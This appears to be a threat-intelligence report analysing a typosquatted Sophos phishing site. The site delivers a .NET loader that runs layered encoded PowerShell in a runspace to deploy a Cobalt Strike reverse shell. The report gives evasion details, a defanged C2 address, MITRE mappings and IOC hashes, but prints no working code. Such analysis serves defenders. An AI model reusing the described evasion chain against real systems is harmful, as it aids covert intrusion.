- Cyble Research & Intelligence Labs (CRIL) encountered a typosquatted domain of Sophos.
- The phishing site contains a malware payload embedded within its source code.
- When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.
- The phishing website distributes a malicious .NET loader containing an embedded PowerShell script.
- To execute this PowerShell script, a runspace is utilized, preventing the creation of new PowerShell processes and facilitating the dynamic execution of subsequent PowerShell scripts.
- This script delivers a Cobalt Strike beacon, establishing a reverse TCP shell with an IP address encoded in hexadecimal format.
Cyble Research & Intelligence Labs (CRIL) came across a typosquatted domain of Sophos, “sopbos[.]com”, using a VirusTotal search. The phishing site impersonates the installation of the Sophos Home.
The initial infection vector is unclear at this time as we could not trace how users would be directed to this phishing site. Based on the phishing site, we suspect users might have reached it via a phishing email or ads containing a link asking them to install Sophos Home. Upon clicking on the link, this site initiates automatic payload downloads without requiring any user interaction.
The figure below shows the malicious site impersonating Sophos.
The downloaded file is a malicious .Net loader that contains an embedded PowerShell script. Notably, this PowerShell script is executed within a runspace, preventing the creation of new PowerShell processes and enabling on-the-fly execution of subsequent scripts. Ultimately, a Cobalt Strike beacon is deployed that establishes a reverse TCP shell.
The figure below shows the code of the phishing site.
The figure below shows the code for downloading the file.
The downloaded file is a 64-bit .Net binary that, upon execution, uses a runspace to execute the embedded PowerShell code. The runspace is achieved by the malware using the RunspaceFactory.CreateRunspace () method as shown in Figure 4. This method allows the execution of the PowerShell script without requiring it to be saved on the disk or creating a new process. Consequently, it minimizes the occurrence of PowerShell events, reducing the likelihood of detection by security solutions.
This executable can also run with specific command line parameters. It examines whether any of the provided optional arguments have been supplied and adjusts the binary’s behavior accordingly.
|Command Line Argument||Description||Case Sensitive|
|-wait||Prints “Hit any key to exit…”||Yes|
|-extract||Writes the decoded PowerShell to a file||No|
|-end||Stores the position at which this argument is passed||Yes|
|-debug||launches the debugger using System.Diagnostics.Debugger.Launch()||Yes|
Following this, the executable decodes the Base64-encoded PowerShell script present within it and loads it into the PowerShell runspace session using the AddScript() method. Subsequently, it initiates the script’s execution using the BeginInvoke() method.
The figure below illustrates the encoded PowerShell script.
Now, the Powershell script is executed, which decodes an additional Base64-encoded string and then performs AES decryption on the decoded data, followed by decompression. The resulting data is converted to a UTF-8 encoded string. Finally, it executes another PowerShell script extracted from this processed data using the Invoke-Expression cmdlet. This script, shown in Figure 6, essentially serves as a method to hide and execute PowerShell code for the next stage.
While both scripts follow a similar type of decryption, decompression, and script execution, they employ different decryption keys, initialization vectors (IVs), and compression algorithms. The first script uses the Deflate algorithm, while the second script utilizes the Gzip stream for decompression.
The figure below shows the comparison between scripts.
The second PowerShell script decrypts and executes the final PowerShell script. The final PowerShell script is a Cobalt Strike beacon. It sets up a reverse shell, where a remote attacker can send commands to the machine, execute them, and receive responses from the compromised machine.
The final PowerShell script begins with the command “Start – Process $PSHOME\ powershell.exe” to launch a PowerShell instance, causing it to execute through this process instead of within a runspace, as illustrated in the figure below.
The final PowerShell script establishes a network connection to a remote server represented by the IP address and port provided in hexadecimal format, as mentioned below.
- 0x6247e8df: 98[.]71.232[.]223
- 0x1f90: 8080
The script then creates a data stream and reads incoming data in chunks. It converts this received data from bytes to text, executes it using iex (Invoke-Expression), captures the output, appends a custom string, and sends it back to the remote server. This process continues in a loop until no more data is received, after which the network connection is closed.
As the C&C server is down, we were not able to investigate further on this.
The figure below shows the Cobalt Strike beacon.
In the past, Cobalt Strike has been employed by Threat Actors (TAs) to distribute various malware payloads, including ransomware and Remote Access Trojans (RATs). Unfortunately, due to the C&C (Command and Control) server being inaccessible, we were unable to examine the specific malware payload that the TAs intended to deploy. However, it is worth noting that in this campaign, a .Net loader was utilized to execute PowerShell scripts through runspace. Though this is not a new technique, it enhances the malware’s evasiveness by executing scripts without spawning new processes or saving them to the disk, thereby reducing the possibility of detection.
- Deploy Cobalt Strike-specific signatures and rules for your network monitoring solution.
- Implement application whitelisting to restrict the execution of PowerShell scripts to only approved and trusted scripts or locations.
- Block the malicious IOCs shared in the table below.
MITRE ATT&CK® Techniques
|Initial Access (TA0001)||Phishing (T1566)||This malware reaches users via phishing sites.|
|Execution (TA0002)||User Execution (T1204)||The user needs to manually execute the malicious file downloaded from the phishing site.|
|Execution (TA0002)||Command and Scripting Interpreter (T1059)||PowerShell scripts are used to execute the Cobalt Strike beacon.|
|Defense Evasion (TA0005)||Indirect Command Execution (T1202)||PowerShell commands are executed using a malicious executable.|
|Defense Evasion (TA0005)||Masquerading (T1036)||The downloaded file is disguised as a Sophos installer.|
|Defense Evasion (TA0005)||Deobfuscate/Decode Files or Information(T1140)||PowerShell scripts are deobfuscated and decoded to get the Cobalt Strike beacon.|
|Command and Control (TA0011)||Non-Application Layer Protocol (T1095)||TCP is used by the Cobalt Strike beacon to interact with the C&C server.|
Indicators of Compromise (IOCs)
|c974ffe23d57ec909ef26b55f202047e ec6da5616d6b3b3269fababe104bfe04f2828717 067c95ad074afd8993281b02f74d0f257fb312943da0887355da652afb54c0ab||MD5|